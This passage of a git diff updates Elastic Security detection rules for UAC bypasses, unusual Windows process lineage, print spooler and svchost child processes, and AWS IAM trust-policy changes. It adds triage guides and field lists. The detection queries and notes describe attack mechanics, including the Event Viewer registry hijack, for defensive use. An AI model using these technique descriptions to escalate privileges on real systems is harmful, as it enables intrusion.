\"C:\\\\Windows\\\\WinSxS\\\\*\")\n", "references": [ "https://github.com/hfiref0x/UACME" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "5a14d01d-7ac8-4545-914c-b687c2cf66b3", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_event_viewer.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_event_viewer.json index 6c02f1d5587af..cd1b190332fe6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_event_viewer.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_event_viewer.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Bypass UAC via Event Viewer", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable : \n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\", \n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Bypass UAC via Event Viewer\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) \nto perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nUAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the \nlocal administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nDuring startup, `eventvwr.exe` checks the registry value of the `HKCU\\Software\\Classes\\mscfile\\shell\\open\\command`\nregistry key for the location of `mmc.exe`, which is used to open the `eventvwr.msc` saved console file. If the location\nof another binary or script is added to this registry value, it will be executed as a high-integrity process without a\nUAC prompt being displayed to the user. This rule detects this UAC bypass by monitoring processes spawned by\n`eventvwr.exe` other than `mmc.exe` and `werfault.exe`.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"eventvwr.exe\" and\n not process.executable :\n (\"?:\\\\Windows\\\\SysWOW64\\\\mmc.exe\",\n \"?:\\\\Windows\\\\System32\\\\mmc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "31b4c719-f2b4-41f6-a9bd-fce93c2eaf62", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 10 + "version": 12 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_mock_windir.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_mock_windir.json index 7da33e8648100..c1aac3e37f939 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_mock_windir.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_mock_windir.json @@ -12,13 +12,26 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt via Windows Directory Masquerading", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass Attempt via Windows Directory Masquerading\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) \nto perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nUAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the \nlocal administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies an attempt to bypass User Account Control (UAC) by masquerading as a Microsoft trusted Windows\ndirectory. Attackers may bypass UAC to stealthily execute code with elevated permissions.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- If any of the spawned processes are suspicious, retrieve them and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.args : (\"C:\\\\Windows \\\\system32\\\\*.exe\", \"C:\\\\Windows \\\\SysWOW64\\\\*.exe\")\n", "references": [ "https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "290aca65-e94d-403b-ba0f-62f320e63f51", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -53,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_winfw_mmc_hijack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_winfw_mmc_hijack.json index 6ca1058cebc7f..2417360fe9368 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_winfw_mmc_hijack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_winfw_mmc_hijack.json @@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass via Windows Firewall Snap-In Hijack", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating UAC Bypass via Windows Firewall Snap-In Hijack\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) \nto perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nUAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the \nlocal administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nThis rule identifies attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC)\nWindows Firewall snap-in. Attackers bypass UAC to stealthily execute code with elevated permissions.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- If any of the spawned processes are suspicious, retrieve them and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name == \"mmc.exe\" and\n /* process.Ext.token.integrity_level_name == \"high\" can be added in future for tuning */\n /* args of the Windows Firewall SnapIn */\n process.parent.args == \"WF.msc\" and process.name != \"WerFault.exe\"\n", "references": [ "https://github.com/AzAgarampur/byeintegrity-uac" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "1178ae09-5aff-460a-9f2f-455cd0ac4d8e", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_parentchild_relationship.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_parentchild_relationship.json index 5fb9682323ac5..8340ac3f4629b 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_parentchild_relationship.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_parentchild_relationship.json @@ -12,14 +12,32 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Parent-Child Relationship", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Unusual Parent-Child Relationship\n\nWindows internal/system processes have some characteristics that can be used to spot suspicious activities. One of these\ncharacteristics is parent-child relationships. These relationships can be used to baseline the typical behavior of the\nsystem and then alert on occurrences that don't comply with the baseline.\n\nThis rule uses this information to spot suspicious parent and child processes.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file\nmodifications, and any spawned child processes.\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\nprocess.parent.name != null and\n (\n /* suspicious parent processes */\n (process.name:\"autochk.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"fontdrvhost.exe\", \"dwm.exe\") and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:(\"consent.exe\", \"RuntimeBroker.exe\", \"TiWorker.exe\") and not process.parent.name:\"svchost.exe\") or\n (process.name:\"SearchIndexer.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"SearchProtocolHost.exe\" and not process.parent.name:(\"SearchIndexer.exe\", \"dllhost.exe\")) or\n (process.name:\"dllhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"smss.exe\" and not process.parent.name:(\"System\", \"smss.exe\")) or\n (process.name:\"csrss.exe\" and not process.parent.name:(\"smss.exe\", \"svchost.exe\")) or\n (process.name:\"wininit.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:\"winlogon.exe\" and not process.parent.name:\"smss.exe\") or\n (process.name:(\"lsass.exe\", \"LsaIso.exe\") and not process.parent.name:\"wininit.exe\") or\n (process.name:\"LogonUI.exe\" and not process.parent.name:(\"wininit.exe\", \"winlogon.exe\")) or\n (process.name:\"services.exe\" and not process.parent.name:\"wininit.exe\") or\n (process.name:\"svchost.exe\" and not process.parent.name:(\"MsMpEng.exe\", \"services.exe\")) or\n (process.name:\"spoolsv.exe\" and not process.parent.name:\"services.exe\") or\n (process.name:\"taskhost.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"taskhostw.exe\" and not process.parent.name:(\"services.exe\", \"svchost.exe\")) or\n (process.name:\"userinit.exe\" and not process.parent.name:(\"dwm.exe\", \"winlogon.exe\")) or\n (process.name:(\"wmiprvse.exe\", \"wsmprovhost.exe\", \"winrshost.exe\") and not process.parent.name:\"svchost.exe\") or\n /* suspicious child processes */\n (process.parent.name:(\"SearchProtocolHost.exe\", \"taskhost.exe\", \"csrss.exe\") and not process.name:(\"werfault.exe\", \"wermgr.exe\", \"WerFaultSecure.exe\")) or\n (process.parent.name:\"autochk.exe\" and not process.name:(\"chkdsk.exe\", \"doskey.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"smss.exe\" and not process.name:(\"autochk.exe\", \"smss.exe\", \"csrss.exe\", \"wininit.exe\", \"winlogon.exe\", \"setupcl.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"wermgr.exe\" and not process.name:(\"WerFaultSecure.exe\", \"wermgr.exe\", \"WerFault.exe\")) or\n (process.parent.name:\"conhost.exe\" and not process.name:(\"mscorsvw.exe\", \"wermgr.exe\", \"WerFault.exe\", \"WerFaultSecure.exe\"))\n )\n", "references": [ "https://github.com/sbousseaden/Slides/blob/master/Hunting%20MindMaps/PNG/Windows%20Processes%20TH.map.png", "https://www.andreafortuna.org/2017/06/15/standard-windows-processes-a-brief-reference/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "35df0dd8-092d-4a83-88c1-5151a804f31b", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -54,5 +72,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_printspooler_childprocess.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_printspooler_childprocess.json index 0218eda10e75f..a2307f479190f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_printspooler_childprocess.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_printspooler_childprocess.json @@ -15,13 +15,46 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Print Spooler Child Process", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type == \"start\" and\n process.parent.name : \"spoolsv.exe\" and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n\n /* exclusions for FP control below */\n not process.name : (\"splwow64.exe\", \"PDFCreator.exe\", \"acrodist.exe\", \"spoolsv.exe\", \"msiexec.exe\", \"route.exe\", \"WerFault.exe\") and\n not process.command_line : \"*\\\\WINDOWS\\\\system32\\\\spool\\\\DRIVERS*\" and\n not (process.name : \"net.exe\" and process.command_line : (\"*stop*\", \"*start*\")) and\n not (process.name : (\"cmd.exe\", \"powershell.exe\") and process.command_line : (\"*.spl*\", \"*\\\\program files*\", \"*route add*\")) and\n not (process.name : \"netsh.exe\" and process.command_line : (\"*add portopening*\", \"*rule name*\")) and\n not (process.name : \"regsvr32.exe\" and process.command_line : \"*PrintConfig.dll*\")\n", "references": [ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ee5300a7-7e31-4a72-a258-250abb8b3aa1", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +82,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_svchost_childproc_childless.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_svchost_childproc_childless.json index 9757765bf4af0..c7112077bc0e6 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_svchost_childproc_childless.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_unusual_svchost_childproc_childless.json @@ -15,10 +15,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Unusual Service Host Child Process - Childless Service", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"svchost.exe\" and\n\n /* based on svchost service arguments -s svcname where the service is known to be childless */\n\n process.parent.args : (\"WdiSystemHost\",\"LicenseManager\",\n \"StorSvc\",\"CDPSvc\",\"cdbhsvc\",\"BthAvctpSvc\",\"SstpSvc\",\"WdiServiceHost\",\n \"imgsvc\",\"TrkWks\",\"WpnService\",\"IKEEXT\",\"PolicyAgent\",\"CryptSvc\",\n \"netprofm\",\"ProfSvc\",\"StateRepository\",\"camsvc\",\"LanmanWorkstation\",\n \"NlaSvc\",\"EventLog\",\"hidserv\",\"DisplayEnhancementService\",\"ShellHWDetection\",\n \"AppHostSvc\",\"fhsvc\",\"CscService\",\"PushToInstall\") and\n\n /* unknown FPs can be added here */\n\n not process.name : (\"WerFault.exe\",\"WerFaultSecure.exe\",\"wermgr.exe\")\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.parent.name : \"svchost.exe\" and\n\n /* based on svchost service arguments -s svcname where the service is known to be childless */\n\n process.parent.args : (\"WdiSystemHost\",\"LicenseManager\",\n \"StorSvc\",\"CDPSvc\",\"cdbhsvc\",\"BthAvctpSvc\",\"SstpSvc\",\"WdiServiceHost\",\n \"imgsvc\",\"TrkWks\",\"WpnService\",\"IKEEXT\",\"PolicyAgent\",\"CryptSvc\",\n \"netprofm\",\"ProfSvc\",\"StateRepository\",\"camsvc\",\"LanmanWorkstation\",\n \"NlaSvc\",\"EventLog\",\"hidserv\",\"DisplayEnhancementService\",\"ShellHWDetection\",\n \"AppHostSvc\",\"fhsvc\",\"CscService\",\"PushToInstall\") and\n\n /* unknown FPs can be added here */\n\n not process.name : (\"WerFault.exe\",\"WerFaultSecure.exe\",\"wermgr.exe\") and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\RelPost.exe\" and process.parent.args : \"WdiSystemHost\") and\n not (process.name : \"rundll32.exe\" and\n process.args : \"?:\\\\WINDOWS\\\\System32\\\\winethc.dll,ForceProxyDetectionOnNextRun\" and process.parent.args : \"WdiServiceHost\") and\n not (process.executable : (\"?:\\\\Program Files\\\\*\", \"?:\\\\Program Files (x86)\\\\*\", \"?:\\\\Windows\\\\System32\\\\Kodak\\\\kds_i4x50\\\\lib\\\\lexexe.exe\") and\n process.parent.args : \"imgsvc\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "6a8ab9cc-4023-4d17-b5df-1a3e16882ce7", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -69,5 +102,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_updateassumerolepolicy.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_updateassumerolepolicy.json index e46e59feea6f0..89e2918d3f61d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_updateassumerolepolicy.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_updateassumerolepolicy.json @@ -15,13 +15,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS IAM Assume Role Policy Update", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS IAM Assume Role Policy Update\n\nAn IAM role is an IAM identity that you can create in your account that has specific permissions. An IAM role is similar\nto an IAM user, in that it is an AWS identity with permission policies that determine what the identity can and cannot\ndo in AWS. However, instead of being uniquely associated with one person, a role is intended to be assumable by anyone\nwho needs it. Also, a role does not have standard long-term credentials such as a password or access keys associated\nwith it. Instead, when you assume a role, it provides you with temporary security credentials for your role session.\n\nThe role trust policy is a JSON document in which you define the principals you trust to assume the role. This policy is\na required resource-based policy that is attached to a role in IAM. An attacker may attempt to modify this policy by\nusing the `UpdateAssumeRolePolicy` API action to gain the privileges of that role.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Contact the account and resource owners and confirm whether they are aware of this activity.\n- Check if this operation was approved and performed according to the organization's change management policy.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking servers, services,\nand data accessed by the 